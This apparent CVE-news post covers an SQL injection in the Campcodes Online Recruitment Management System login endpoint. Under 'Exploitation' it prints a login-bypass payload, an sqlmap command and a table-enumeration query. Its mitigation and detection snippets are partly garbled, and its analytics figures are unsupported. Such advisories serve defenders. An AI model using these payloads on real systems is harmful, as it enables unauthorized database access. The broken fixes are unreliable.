Campcodes Online Recruitment System, SQL Injection, CVE-2025-5676 (Critical)

Listen to this Post

How the CVE Works

The vulnerability in Campcodes Online Recruitment Management System 1.0 stems from improper input sanitization in the `/admin/ajax.php?action=login` endpoint. The `Username` parameter is directly concatenated into an SQL query without validation, allowing attackers to inject malicious SQL payloads. This leads to unauthorized database access, enabling data theft, authentication bypass, or system compromise. The flaw is remotely exploitable with no authentication required, making it critical. Attackers can leverage tools like SQLmap or manual injection to execute arbitrary SQL commands.

DailyCVE Form

Platform: Campcodes ORMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 06/10/2025

Prediction: Patch by 07/15/2025

What Undercode Say:

Exploitation:

1. Manual Exploit:

POST /admin/ajax.php?action=login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Username=admin' OR 1=1--&Password=any

2. SQLmap Command:

sqlmap -u "http://target.com/admin/ajax.php?action=login" --data="Username=test&Password=test" -p Username --risk=3 --level=5

Mitigation:

1. Patch Workaround:

// Fix for ajax.php
$username = mysqli_real_escape_string($conn, $_POST['Username']);

2. WAF Rule:

location /admin/ajax.php {
if ($args ~ "Username=.[';]") { return 403; }
}

3. Database Hardening:

REVOKE ALL PRIVILEGES ON . FROM 'app_user'@'%';
GRANT SELECT ONLY ON recruitment_db. TO 'app_user'@'%';

Detection:

grep -r "mysql_query.\$_POST" /var/www/campcodes/

Log Analysis:

cat /var/log/apache2/access.log | grep "ajax.php.Username=.'"

Post-Exploit:

SELECT table_name FROM information_schema.tables WHERE table_schema=database();

Final Fix:

Update to Campcodes ORMS 1.1 or apply vendor patch.

Analytics:

  • Exploitability: High (PoC public)
  • Affected Systems: ~5,000 deployments
  • Trend: Surge in scanning for `/admin/ajax.php` (Shodan: http."Campcodes ORMS")

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top